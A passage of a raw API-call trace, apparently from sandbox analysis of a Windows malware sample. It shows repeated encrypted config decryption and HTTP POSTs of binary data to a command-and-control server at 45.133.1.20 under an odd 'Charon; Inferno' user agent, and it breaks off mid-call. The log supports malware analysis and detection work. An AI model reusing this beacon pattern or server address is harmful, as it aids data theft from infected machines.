0x6baad0 [0291.205] socket (af=2, type=1, protocol=6) returned 0xad4 [0291.206] connect (s=0xad4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0291.230] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0291.230] GetProcessHeap () returned 0x6a0000 [0291.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0291.230] GetProcessHeap () returned 0x6a0000 [0291.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0291.231] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.232] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.232] GetProcessHeap () returned 0x6a0000 [0291.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d7f30 [0291.232] GetProcessHeap () returned 0x6a0000 [0291.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.233] GetProcessHeap () returned 0x6a0000 [0291.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0291.233] GetProcessHeap () returned 0x6a0000 [0291.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0291.234] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.235] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.235] GetProcessHeap () returned 0x6a0000 [0291.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0291.235] GetProcessHeap () returned 0x6a0000 [0291.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.236] send (s=0xad4, buf=0x6bd460*, len=242, flags=0) returned 242 [0291.236] send (s=0xad4, buf=0x6bb998*, len=159, flags=0) returned 159 [0291.237] GetProcessHeap () returned 0x6a0000 [0291.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0291.237] recv (in: s=0xad4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0291.363] GetProcessHeap () returned 0x6a0000 [0291.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0291.364] GetProcessHeap () returned 0x6a0000 [0291.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0291.364] GetProcessHeap () returned 0x6a0000 [0291.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f30 | out: hHeap=0x6a0000) returned 1 [0291.365] GetProcessHeap () returned 0x6a0000 [0291.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0291.365] closesocket (s=0xad4) returned 0 [0291.366] GetProcessHeap () returned 0x6a0000 [0291.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0291.366] GetProcessHeap () returned 0x6a0000 [0291.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.367] GetProcessHeap () returned 0x6a0000 [0291.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0291.367] GetProcessHeap () returned 0x6a0000 [0291.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0291.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb80) returned 0xad4 [0291.376] Sleep (dwMilliseconds=0xea60) [0291.377] GetProcessHeap () returned 0x6a0000 [0291.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0291.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0291.401] GetProcessHeap () returned 0x6a0000 [0291.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0291.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.410] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0291.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.411] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.412] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.412] GetProcessHeap () returned 0x6a0000 [0291.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0291.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.414] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0291.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.415] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0291.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.416] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0291.416] GetProcessHeap () returned 0x6a0000 [0291.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.417] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.418] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.419] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.420] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.420] GetProcessHeap () returned 0x6a0000 [0291.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0291.420] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0291.420] GetProcessHeap () returned 0x6a0000 [0291.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0291.420] GetProcessHeap () returned 0x6a0000 [0291.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.421] GetProcessHeap () returned 0x6a0000 [0291.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0291.421] GetProcessHeap () returned 0x6a0000 [0291.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0291.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0291.436] GetProcessHeap () returned 0x6a0000 [0291.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0291.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.437] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0291.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.440] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.441] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.441] GetProcessHeap () returned 0x6a0000 [0291.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0291.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.442] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0291.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.443] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0291.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.445] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0291.445] GetProcessHeap () returned 0x6a0000 [0291.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.446] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0291.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.447] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0291.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.448] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0291.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.451] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0291.451] GetProcessHeap () returned 0x6a0000 [0291.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0291.451] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0291.451] GetProcessHeap () returned 0x6a0000 [0291.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0291.451] socket (af=2, type=1, protocol=6) returned 0xad8 [0291.452] connect (s=0xad8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0291.492] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0291.492] GetProcessHeap () returned 0x6a0000 [0291.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0291.492] GetProcessHeap () returned 0x6a0000 [0291.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0291.493] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.494] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0291.494] GetProcessHeap () returned 0x6a0000 [0291.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d7ff0 [0291.494] GetProcessHeap () returned 0x6a0000 [0291.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.495] GetProcessHeap () returned 0x6a0000 [0291.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0291.495] GetProcessHeap () returned 0x6a0000 [0291.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9b20 [0291.496] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.497] wvsprintfA (in: param_1=0x6d9b20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0291.497] GetProcessHeap () returned 0x6a0000 [0291.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0291.497] GetProcessHeap () returned 0x6a0000 [0291.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b20 | out: hHeap=0x6a0000) returned 1 [0291.498] send (s=0xad8, buf=0x6bd460*, len=242, flags=0) returned 242 [0291.498] send (s=0xad8, buf=0x6bb998*, len=159, flags=0) returned 159 [0291.499] GetProcessHeap () returned 0x6a0000 [0291.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0291.499] recv (in: s=0xad8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0291.561] GetProcessHeap () returned 0x6a0000 [0291.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0291.562] GetProcessHeap () returned 0x6a0000 [0291.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0291.562] GetProcessHeap () returned 0x6a0000 [0291.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7ff0 | out: hHeap=0x6a0000) returned 1 [0291.563] GetProcessHeap () returned 0x6a0000 [0291.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0291.563] closesocket (s=0xad8) returned 0 [0291.566] GetProcessHeap () returned 0x6a0000 [0291.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0291.566] GetProcessHeap () returned 0x6a0000 [0291.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.567] GetProcessHeap () returned 0x6a0000 [0291.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0291.567] GetProcessHeap () returned 0x6a0000 [0291.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0291.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x334) returned 0xad8 [0291.570] Sleep (dwMilliseconds=0xea60) [0291.571] GetProcessHeap () returned 0x6a0000 [0291.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0291.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.582] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0291.595] GetProcessHeap () returned 0x6a0000 [0291.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0291.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.599] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0291.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.603] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.605] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.605] GetProcessHeap () returned 0x6a0000 [0291.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0291.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.607] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0291.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.608] CryptDestroyKey (hKey=0x6ad020) returned 1 [0291.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.609] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0291.609] GetProcessHeap () returned 0x6a0000 [0291.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.610] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0291.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.612] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0291.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.613] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0291.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0291.615] GetProcessHeap () returned 0x6a0000 [0291.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0291.615] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0291.615] GetProcessHeap () returned 0x6a0000 [0291.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0291.616] GetProcessHeap () returned 0x6a0000 [0291.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0291.616] GetProcessHeap () returned 0x6a0000 [0291.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0291.617] GetProcessHeap () returned 0x6a0000 [0291.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0291.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.618] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0291.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0291.654] GetProcessHeap () returned 0x6a0000 [0291.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0291.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.671] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0291.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.673] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0291.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.674] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0291.674] GetProcessHeap () returned 0x6a0000 [0291.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0291.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.676] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0291.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.677] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0291.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0291.679] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0291.679] GetProcessHeap () returned 0x6a0000 [0291.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0291.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.680] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0291.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.684] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0291.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.685] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0291.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.687] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0291.687] GetProcessHeap () returned 0x6a0000 [0291.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0291.687] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0291.687] GetProcessHeap () returned 0x6a0000 [0291.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0291.687] socket (af=2, type=1, protocol=6) returned 0xadc [0291.688] connect (s=0xadc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0291.715] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0291.715] GetProcessHeap () returned 0x6a0000 [0291.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0291.715] GetProcessHeap () returned 0x6a0000 [0291.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9b20 [0291.716] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0291.717] wvsprintfA (in: param_1=0x6d9b20, param_2="POST %s 